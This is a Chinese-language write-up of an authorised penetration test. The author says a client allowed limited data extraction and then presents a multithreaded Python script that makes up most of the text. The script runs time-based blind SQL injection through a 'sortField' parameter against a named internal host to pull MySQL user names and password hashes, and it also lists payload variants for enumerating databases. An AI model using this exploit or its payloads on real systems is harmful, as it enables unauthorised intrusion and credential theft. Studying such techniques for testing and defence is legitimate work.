记一次Sql盲注

在22年2月份的时候，leader给了个任务，让测个站。因为站点是搭在贵阳那边，还要挂VPN
那没办法 只能硬着头皮上了

上去就先扫了一通目录

但是没啥收获,xray被动扫描 看看

我又觉得我可以了

然后问了一下客户,客户说可以爆数据,但是只能爆一点点

行吧 写了脚本跑一下盲注

EXP

import threading
import requests
from time import time, sleep
# import threadpool
# import multiprocessing as mp
import queue
import logging

# Root logger: INFO and above, one line per event with a timestamp.
logging.basicConfig(level=logging.INFO,
                    format="%(asctime)s %(filename)s %(levelname)s %(message)s",
                    datefmt="%a %d %b %Y %H:%M:%S")
# Hard-coded application token sent with every request below, i.e. the
# probes run as an already-authenticated user of the target.
headers = {
    'Token': '5e4b0719a1884425a8477719e6e7e42f'
}
# One HTTP session shared by the main thread and all worker threads.
s = requests.session()
# Not referenced by the request functions, which repeat the literal URL.
url = "http://172.16.65.99/api/system/user/list"
# Local intercepting proxy for inspection; the next line disables it, so
# requests go direct unless that assignment is removed.
proxies = {"http": "http://127.0.0.1:8080"}
proxies = None
# Reentrant lock: only getAllLength acquires it (and never releases it);
# the worker's acquire/release calls are commented out.
lock = threading.RLock()
# Shared state written by the workers: `data` holds the most recent result
# (a one-character string or None) and `dbnames` maps 1-based position
# -> recovered character.
data = None
dbnames = {}

class myThread(threading.Thread):
    """Worker that drains a queue of ``(callable, argument)`` jobs forever.

    Each job returns a ``(value, position)`` pair.  The value is stored in
    the module-level ``data`` and, when truthy, recorded in ``dbnames`` under
    ``position``.  ``task_done`` is signalled after each job so the producer's
    ``join()`` can wait for the whole batch.
    """

    def __init__(self, queue):
        super().__init__()
        self.__queue = queue

    def run(self):
        global data, dbnames
        job_queue = self.__queue
        while True:
            job, argument = job_queue.get()
            # Rebinds the module-level `data` on every job, not just on hits.
            data, position = job(argument)
            if data:
                dbnames[position] = data
            job_queue.task_done()  # marks the job finished for queue.join()

# f"(select*from(select+if(length((select group_concat(schema_name) from information_schema.schemata))='{str(length)}',sleep(2),1)union/**/select+1)a)",
# select length((select concat(user, ',',authentication_string) from mysql.user limit 0, 1));
def getAllLength():
    """Return the length of the probed string, inferred from response timing.

    Starting at 41, each iteration sends one request whose ``sortField``
    value makes the server sleep 2 s only when the length equals the current
    guess; the first request that takes longer than 2 s wall-clock ends the
    loop and its guess is returned.  There is no upper bound, so the loop
    never terminates if no response ever exceeds the threshold.

    NOTE(review): from the server side the only artefacts are the
    ``sortField`` value and the latency pattern, which is what input
    validation on that parameter or a slow-query log would surface.
    """
    length = 40
    while True:
        length += 1
        json = {
            "pageNum": 1,
            "pageSize": 10,
            "sortField": f"(select*from(select+if(length((select concat(user, ',',authentication_string) from mysql.user limit 0, 1))='{str(length)}',sleep(2),1)union/**/select+1)a)",
            "sortOrder": "desc"
        }
        # Acquired once per iteration and never released; RLock is reentrant
        # so the calling thread is not blocked, and no worker uses the lock.
        lock.acquire()
        start = time()
        _ = s.post('http://172.16.65.99/api/system/user/list', headers=headers, json=json, proxies=proxies)
        logging.info("猜解当前数据长度为:" + str(length))
        # Wall-clock threshold: any delay above 2 s, including plain network
        # latency, counts as a hit.
        if time() - start > 2:
            logging.info("长度为" + str(length))
            return length

# '''select if(ascii(substr((select concat(user, ',',authentication_string) from mysql.user limit 0, 1),1,1))=114,sleep(3),1);'''
# f"(select*from(select+if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{str(numbers)},1))={asciis},sleep(3),1)union/**/select+1)a)",
def getAllName(numbers, asciis=0):
    """Recover the character at 1-based position ``numbers`` via timing.

    Codes 21..126 are tried in order; the first request that takes more than
    3 s wall-clock is treated as a match and ``(chr(code), numbers)`` is
    returned.  The ``asciis`` parameter is immediately shadowed by the loop
    variable, so its value is never used.  If no code triggers the delay the
    function falls off the end and returns None, which the worker thread
    cannot unpack into two values.
    """
    for asciis in range(21, 127):
        json = {
            "pageNum": 1,
            "pageSize": 10,
            "sortField": f"(select*from(select+if(ascii(substr((select concat(user, ',',authentication_string) from mysql.user limit 0, 1),{str(numbers)},1))={asciis},sleep(3),1)union/**/select+1)a)",
            "sortOrder": "desc"
        }
        start = time()
        _ = s.post('http://172.16.65.99/api/system/user/list', headers=headers, json=json, proxies=proxies)
        # Elapsed wall-clock time for the whole round trip, not server time.
        add_time = time() - start
        # print(add_time)
        if add_time > 3:
            logging.info("第" + str(numbers) + "个字符为:" + chr(asciis))
            return chr(asciis), numbers

def display_word(dict1):
    """Concatenate the values of ``dict1`` in ascending key order.

    Keys are the 1-based character positions, so the result is the
    recovered string read left to right; an empty dict yields ``""``.
    """
    ordered_keys = sorted(dict1)
    return "".join(dict1[key] for key in ordered_keys)

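if __name__ == '__main__':
    # Named `job_queue` so the instance no longer shadows the imported
    # ``queue`` module.
    job_queue = queue.Queue(6)
    # One daemon worker per queue slot; daemon threads die with the main
    # thread (``t.daemon = True`` replaces the deprecated setDaemon()).
    for i in range(job_queue.maxsize):
        t = myThread(job_queue)
        t.daemon = True
        t.start()
    time_now = time()
    # getAllLength() runs first, in this thread; then one job per position.
    for numbers in range(1, getAllLength()+1):
        logging.info(f"猜解第{str(numbers)}个字符")
        # Reset the shared result slot before queuing the next position.
        if data:
            data = None
        job_queue.put((getAllName, numbers))
    # Blocks until every queued job has called task_done().
    job_queue.join()
    logging.info(display_word(dbnames))

    print("花费:" + str(time() - time_now))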

这是一部分猜解